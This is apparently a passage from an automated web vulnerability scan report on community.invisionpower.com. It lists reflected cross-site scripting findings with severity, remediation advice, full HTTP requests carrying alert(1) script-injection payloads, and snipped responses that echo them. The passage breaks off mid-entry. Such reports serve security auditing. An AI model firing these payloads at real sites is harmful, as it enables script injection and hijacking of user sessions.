GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?25d4c'><script>alert(1)</script>76947efd1fd=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75d7b'><script>alert(1)</script>981f0c014da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment75d7b'><script>alert(1)</script>981f0c014da HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4653b"-alert(1)-"8c738f7fd40 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment4653b"-alert(1)-"8c738f7fd40 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment4653b"-alert(1)-"8c738f7fd40"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Payment Improvements & Anti-Fraud Protection"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.30. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a9c"-alert(1)-"cf40b1e321c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?e2a9c"-alert(1)-"cf40b1e321c=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?e2a9c"-alert(1)-"cf40b1e321c=1"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Custom Customer Fields"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.31. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a23e7'><script>alert(1)</script>edfdfa2120a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/?a23e7'><script>alert(1)</script>edfdfa2120a=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1937a"-alert(1)-"b678fb81f8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment1937a"-alert(1)-"b678fb81f8 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 96d8c'><script>alert(1)</script>195a814bc00 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment96d8c'><script>alert(1)</script>195a814bc00 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <a href='http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment96d8c'><script>alert(1)</script>195a814bc00?_rcid=11592#fastreply' title="Reply directly to this post" id='reply_comment_11592' class='reply_comment'> ...[SNIP]...
2.34. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed0d"-alert(1)-"5c4d62dddb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?aed0d"-alert(1)-"5c4d62dddb8=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?aed0d"-alert(1)-"5c4d62dddb8=1"; ipb.sharelinks.title = "Viril 1.0.1 Release With Bug Fixes & New Features"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.35. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7345'><script>alert(1)</script>8f568237069 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?a7345'><script>alert(1)</script>8f568237069=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edee4"-alert(1)-"26b08451a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcommentedee4"-alert(1)-"26b08451a HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 91bc6'><script>alert(1)</script>783674a36c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment91bc6'><script>alert(1)</script>783674a36c7 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <a href='http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment91bc6'><script>alert(1)</script>783674a36c7?_rcid=11544#fastreply' title="Reply directly to this post" id='reply_comment_11544' class='reply_comment'> ...[SNIP]...
2.38. http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eb36"-alert(1)-"326757020f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/?8eb36"-alert(1)-"326757020f2=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/?8eb36"-alert(1)-"326757020f2=1"; ipb.sharelinks.title = "(SOS31) Improve Next-Previous Issue links in IP.Tracker v1.0.0"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.39. http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 228af"-alert(1)-"3451a0f7ce6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3936-ipdownloads-file-version-in-support-topic-title/?228af"-alert(1)-"3451a0f7ce6=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/?228af"-alert(1)-"3451a0f7ce6=1"; ipb.sharelinks.title = "IP.Downloads file version in support topic title"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.40. http://community.invisionpower.com/files/file/3937-peace/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://community.invisionpower.com
Path:
/files/file/3937-peace/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54fb5"-alert(1)-"94f3b1605b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3937-peace/?54fb5"-alert(1)-"94f3b1605b0=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3937-peace/?54fb5"-alert(1)-"94f3b1605b0=1"; ipb.sharelinks.title = "Peace"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.41. http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0ec7"-alert(1)-"d8405c2df0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/?c0ec7"-alert(1)-"d8405c2df0f=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/?c0ec7"-alert(1)-"d8405c2df0f=1"; ipb.sharelinks.title = "Turkish / T.rk.e Language Pack for (M31) Videos System 2.0.3 (public side)"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.42. http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://community.invisionpower.com
Path:
/files/file/3939-vietnamese-3xx-lang/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 452cc"-alert(1)-"471a521f57a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3939-vietnamese-3xx-lang/?452cc"-alert(1)-"471a521f57a=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
2.43. http://community.invisionpower.com/files/file/3940-dp31-ihost/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://community.invisionpower.com
Path:
/files/file/3940-dp31-ihost/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7300a"-alert(1)-"a151b03b4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3940-dp31-ihost/?7300a"-alert(1)-"a151b03b4b=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3940-dp31-ihost/?7300a"-alert(1)-"a151b03b4b=1"; ipb.sharelinks.title = "(DP31) iHost"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.44. http://community.invisionpower.com/files/file/3941-vanilla-valentine/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://community.invisionpower.com
Path:
/files/file/3941-vanilla-valentine/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18a46"-alert(1)-"12d2b2f2f27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3941-vanilla-valentine/?18a46"-alert(1)-"12d2b2f2f27=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3941-vanilla-valentine/?18a46"-alert(1)-"12d2b2f2f27=1"; ipb.sharelinks.title = "Vanilla Valentine"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.45. http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf855"-alert(1)-"7755996cd4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3942-sos31-file-version-in-online-list/?bf855"-alert(1)-"7755996cd4f=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/?bf855"-alert(1)-"7755996cd4f=1"; ipb.sharelinks.title = "(SOS31) File Version in Online List"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.46. http://community.invisionpower.com/files/file/3943-speed/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://community.invisionpower.com
Path:
/files/file/3943-speed/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7e3"-alert(1)-"7fa62b66d30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3943-speed/?7b7e3"-alert(1)-"7fa62b66d30=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3943-speed/?7b7e3"-alert(1)-"7fa62b66d30=1"; ipb.sharelinks.title = "Speed"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.47. http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://community.invisionpower.com
Path:
/files/file/3944-ipchat-12-turkish-language-pack/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f9a9"-alert(1)-"dc3219cb2fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
